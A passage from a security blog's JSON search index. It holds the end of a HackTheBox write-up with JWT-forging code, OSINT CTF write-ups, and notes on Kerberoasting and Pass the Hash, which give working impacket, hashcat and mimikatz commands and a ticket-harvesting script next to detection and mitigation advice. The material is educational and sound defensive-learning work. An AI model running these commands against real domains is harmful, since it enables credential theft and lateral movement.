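    if not hmac.compare_digest(_hs512(f"{h}.{p}".encode(), key), signature):
        return None
    if not isinstance(payload.get("exp"), int) or payload["exp"] <= now:
        return None
    if payload.get("iss") != ISSUER or payload.get("aud") != audience:
        return None
    return payload


if __name__ == "__main__":
    import time
    t = int(time.time())
    tok = forge_super_admin_jwt(SYMMETRIC_KEY, t)
    print(tok)
    print("admin dashboard accepts:", verify_jwt(tok, SYMMETRIC_KEY, ADMIN_AUDIENCE, t) is not None)
    print("api rejects (aud mismatch):", verify_jwt(tok, SYMMETRIC_KEY, API_AUDIENCE, t) is None)
```

The audience and issuer checks in verify_jwt are what keep a token minted for admin.blazorized.htb from being replayed against api.blazorized.htb, but none of them help once the signing key itself is public: the only real fix is to sign with a key the client never sees, for example an asymmetric pair where only the server holds the private half.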
  },
  {
    "title":     "DamCTF24 - Writeup",
    "permalink": "/posts/damctf24/",
    "date":      "jan 07 2024",
    "summary":   "Writeups for OSINT challenges I solved while competing in DamCTF24 - Placed 27th out of 207 teams.",
    "tags":      ["CTF"],
    "type":      "posts",
    "content":   "These writeups are for the OSINT challenges I solved while competing in DamCTF 2024 with my team, Bonzi_Brigade. This event took place from 06th April - 08th April. Our team scored 1380 points in total and came 27th out of 207 teams.\nasparagus? Authors: alienfoetus, WholeWheatBagels\nSolves: 44\nDescription: Last spring break, we took a short trip to see these special flowers! Can you find where we were?\nChallenge image: Since the challenge is framed as Oregon State University students going on a trip for spring break, I assumed that they would still be in Oregon. I started off by searching for wild purple flowers in Oregon. The ones shown in the screenshot below look to be similar to those found in the provided picture:\nOpening the site this image is from, we see that it is identified as \u0026ldquo;common camas\u0026rdquo;.\nNow that I knew the name of the flower, I searched for where they might be found in Oregon:\nThe Portland Nursery article links to the Oregon Camassia Natural Area:\nThe website for the Oregon Camassia Natural Area has a map showing the location:\nLooking at the Camassia Nature Area on Google Maps we see I-205 is beside it. This could be the road that is behind the individual in the photo. We can find a familiar view by dropping down into street view on the road:\nThis picture was likely taken here, giving a high degree of confidence that the location in the provided picture is the Camassia Natural Area.\nFlag:\ndam{camassia-natural-area}\ngrapes?? Authors: alienfoetus, WholeWheatBagels\nSolves: 13\nDescription: My dad had a friend take a picture of his speeder car, but we forgot where this was. 
Can you find the name of the vineyard in the background?\nHints:\nHint 1: Pay more attention to the environment rather than the speeder cars themselves.\nHint 2: You\u0026rsquo;re looking for a specific vineyard, not the winery that owns it.\nChallenge image: This photo was provided to the organisers by Adam Weidenbach and used with permission during this CTF.\nAdam Weidenbach is based out of California, so it\u0026rsquo;s likely the photo is from this part of the world.\nPutting the image into Google Images, Google Lens focuses on the first train car. We can click on the result for the City of Douglas and it takes us to a document giving some history on trains, including these motor cars.\nWe see that they are called motor cars in this document:\nSearching for \u0026ldquo;california vineyard with motorcar track\u0026rdquo; we see this image for the Pacific Railcar Operators (PRO) group.\nOn this site we see the members standing with a Napa Valley sign. This sign lets us know that it is a \u0026ldquo;wine growing region\u0026rdquo;. It is possible that they visited the area and Adam joined them.\nA list of the wineries along the track is available on the website. There is a left bend in the track at the very start of the provided picture. This got me to look around number 26 (Far Niente) as the track is seen to bend left before going straight alongside the road. I decided to check this area on Google Maps.\nFollowing the track in this area in Google Maps, we see the part that bends to the left, shown in the image below. It also has tree cover on either side. 
Dropping into street view to check this out we can only get a view from further up the track.\nThis has to be it: Google Maps street view\nComparing the features seen from the spot we are in, we can see that they are very similar:\n1 = dip down to smaller hill\n2 = distant trees seen in the gap can be seen in the provided picture\n3 = Hill in the foreground on the right with larger hill behind\nTo get more information on the vineyard, I looked for who owned the land. Reading this article pointed out that the sign was on the land of the Robert Mondavi Winery. Searching for the properties of Robert Mondavi Winery, we see there are 3 vineyards.\nLooking for more information on these, I started searching for maps of the vineyards and came across this map of To Kalon:\nVisting the webiste, we see that the field that is in the photo is To-Kalon vineyard giving us our flag.\nFlag:\n1dam{to-kalon-vineyard} Note: The OSU Security Club GitLab repo for this challenge contains the flag flag{martin-stelling-vineyard}. This extension of To Kalon is shown on the GuildSomm site provided above and would have been the next guess if the flag provided was not accepted.\n"
  },
  {
    "title":     "UTCTF 2024 - Writeups",
    "permalink": "/posts/utctf24/",
    "date":      "jan 03 2024",
    "summary":   "Writeups for OSINT challenges I solved while competing in UTCTF 2024 - Placed 135th out of 854 teams.",
    "tags":      ["CTF"],
    "type":      "posts",
    "content":   "These writeups are for the OSINT challenges I solved while competing in UTCTF 2024 with my team, Bonzi_Brigade. This event took place from 30th March - 1st April. Our team scored 4045 points in total and came 135th out of 854 teams.\nOSINT 1\nAuthor: mzone (@mzone on discord)\nSolves: 202\nDescription: It seems like companies have document leaks all the time nowadays. I wonder if this company has any. (NOTE: It turns out there’s also an actual company named Kakuu in Japan. The real company is not in scope. Please don’t try and hack them.)\nHints:\nHint 1: You’re looking for a leaked document. You won’t find it on their website.\nHint 2: Accounts online associated with the scenario should be (fairly) distinguishable.\nA site for the Kakuu Corporation was hosted and provided with the challenge. Visiting this site, we find a list of employees.\nWith these names we can pass them to Sherlock to check for accounts that may belong to any of these employees.\npython3 sherlock.py <username>\nChecking out the Mastodon account for Cole Minerton, we see that there is a mention of Kakuu Corporation.\nNow that we know this is the right account, we can visit the LinkTree provided on the Mastodon account and see what is available.\nWe see that accounts on Twitter, Reddit, YouTube, and Mastodon are linked.\nChecking out the YouTube account, we find that a Discord link is provided.\nFollowing this link gives us access to a Discord server called Cole’s Hangout. Scrolling through the chat, we see that Cole mentioned getting a client to sign a contract and uploaded a document.\nThe flag is provided on the second page of this leaked document.\nFlag:\nutflag{discord_is_my_favorite_document_leaking_service}\nOSINT 2\nAuthor: mzone (@mzone on discord)\nSolves: 141\nDescription: Can you find where the person you identified in the first challenge lives? Flag format is City,State,Zip. For example, if they live at UT Austin submit Austin,TX,78712.\nHints:\nHint 1: Follow the storyline.\nHint 2: All in scope accounts follow the same naming convention. Once you’ve reached a centralized location any sites you need can be reached in at most 3 clicks.\nComing back to the Mastodon account for Cole Minerton, we see that he mentions having had a great time at Angel Fire and that he plans to visit tomorrow. Since he is planning to visit the next day, it is likely that he lives in the area.\nSearching for Angel Fire, we find that there is a village in the State of New Mexico by that name.\nCole made another post to Mastodon at some fuel pumps before going on a long-distance drive.\nThe image provided has some clues to the location where the picture was taken. First, we can confirm that it is likely to be New Mexico, as there is a lottery advertisement for the state.\nSecondly, we see that there is a street sign showing Cimarron Ave. This gives us a state and street.\nGoing to Google Maps and searching for Cimarron Ave, we see that there are three places in New Mexico with that name.\nDropping into street view, we can look around the areas identified. Looking in the following location, we see an area that looks familiar:\nGoogle Maps street view in Raton\nThis provides us with a location of Raton, New Mexico. Searching for the zip, we see that it is 87740.\nFlag:\nRaton,NM,87740\nOSINT 3\nAuthor: mzone (@mzone on discord)\nSolves: 96\nDescription: Can you find the person’s IP address? Flag format is XXX.XXX.XXX.XXX\nHints:\nHint 1: If you wound up on another (unrelated) discord server, then one of the sites you visited is too new.\nHint 2: All in scope accounts follow the same naming convention. Once you’ve reached a centralized location any sites you need can be reached in at most 3 clicks.\nLooking at the YouTube video Cole has posted, we see a comment where he mentions that he is interested in speedrunning a game called TinyIsland. Cole mentions that there is no wiki yet and that he will create it.\nChecking out the Reddit account listed on LinkTree, we see that Cole is the new moderator of the tinyislandsurvival subreddit. On the right side of this page we see that there is a wiki listed.\nOn the page we see that we have the option to view the history.\nLooking at the history, we see posts from Coleminerton and then an IP address appears in the contributions.\nFlag:\n181.41.206.31\n"
  },
  {
    "title":     "Kerberoasting",
    "permalink": "/notes/kerberoasting/",
    "date":      "jan 01 0001",
    "summary":   "request TGS tickets for SPN accounts offline and crack them — no elevated privileges required.",
    "tags":      ["active-directory","kerberos","credential-access"],
    "type":      "notes",
    "content":   "what is it?\nKerberoasting is an Active Directory attack that allows any authenticated domain user to request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) set. Those tickets are encrypted with the service account’s NTLM hash, meaning they can be taken offline and cracked without any further interaction with the domain controller.\nThe attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.\nrequirements\nAny valid domain user account (no elevated privileges needed)\nNetwork access to the domain controller\nAt least one service account with an SPN registered\nattack steps\n1. enumerate SPNs\nFind accounts with SPNs set using impacket or native tools:\n# impacket\nGetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1\n\n# PowerShell (on-box)\nsetspn -T domain.local -Q */*\n2. request and export tickets\n# request tickets and dump to file for offline cracking\nGetUserSPNs.py domain.local/user:password -dc-ip 10.0.0.1 -request -outputfile hashes.txt\n3. crack offline\nhashcat -m 13100 hashes.txt /path/to/wordlist.txt --rules-file best64.rule\n-m 13100 is the hashcat mode for Kerberos 5 TGS-REP etype 23 (RC4).\nfull automation script\n#!/usr/bin/env python3\n# kerberoast.py — enumerate, request, and save TGS hashes\nimport subprocess\nimport argparse\nimport sys\n\ndef get_spns(domain, user, password, dc_ip):\n    cmd = [\n        \"GetUserSPNs.py\",\n        f\"{domain}/{user}:{password}\",\n        \"-dc-ip\", dc_ip,\n        \"-request\",\n        \"-outputfile\", \"hashes.txt\"\n    ]\n    print(f\"[*] Targeting DC: {dc_ip}\")\n    print(f\"[*] Enumerating SPNs for {domain}...\")\n    result = subprocess.run(cmd, capture_output=True, text=True)\n    if result.returncode == 0:\n        print(\"[+] Hashes saved to hashes.txt\")\n        print(result.stdout)\n    else:\n        print(\"[-] Failed:\", result.stderr, file=sys.stderr)\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"domain\")\n    parser.add_argument(\"user\")\n    parser.add_argument(\"password\")\n    parser.add_argument(\"dc_ip\")\n    args = parser.parse_args()\n    get_spns(args.domain, args.user, args.password, args.dc_ip)\ndetection\nEvent ID 4769 — Kerberos service ticket request. Look for a spike in requests from a single account, or requests for RC4 encryption (etype 0x17) when AES is the domain default.\nHoneypot SPNs — register a fake SPN on a decoy account with a strong password and alert on any TGS request for it.\nmitigation\nUse Group Managed Service Accounts (gMSA) — passwords are 120 characters, auto-rotated, and uncrackable in practice.\nEnforce AES-only Kerberos encryption on service accounts to prevent RC4 downgrade.\nAudit accounts with SPNs regularly: any interactive-login service account is a risk.\ntools\nimpacket GetUserSPNs.py — most common, works remotely\nRubeus — on-box, Rubeus.exe kerberoast\nPowerView — Get-DomainUser -SPN\n"
  },
  {
    "title":     "Pass the Hash",
    "permalink": "/notes/pass-the-hash/",
    "date":      "jan 01 0001",
    "summary":   "authenticate as a user using only their NTLM hash — no plaintext password needed.",
    "tags":      ["lateral-movement","credential-access","windows"],
    "type":      "notes",
    "content":   "what is it?\nPass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.\nrequirements\nA captured NTLM hash (from mimikatz, secretsdump, or similar)\nNetwork access to the target\nTarget must accept NTLM authentication (most Windows environments do)\nattack steps\n1. obtain a hash\n# dump from lsass on a compromised host\nmimikatz # sekurlsa::logonpasswords\n\n# remote dump via impacket\nsecretsdump.py domain/user:password@10.0.0.5\n2. authenticate with the hash\n# psexec with hash\npsexec.py -hashes :ntlmhash domain/administrator@10.0.0.10\n\n# wmiexec\nwmiexec.py -hashes :ntlmhash domain/administrator@10.0.0.10\n\n# smbclient\nsmbclient.py -hashes :ntlmhash domain/administrator@10.0.0.10\ndetection\nEvent ID 4624 logon type 3 (network) with NTLM authentication where Kerberos would be expected\nMismatched workstation names or unusual source IPs for privileged accounts\nmitigation\nEnable Protected Users security group — prevents NTLM auth for member accounts\nDisable NTLM where possible via GPO (Network security: Restrict NTLM)\nUse Credential Guard to protect lsass from memory reads\nEnforce tiered administration to limit where privileged hashes are cached\n"
  }
]
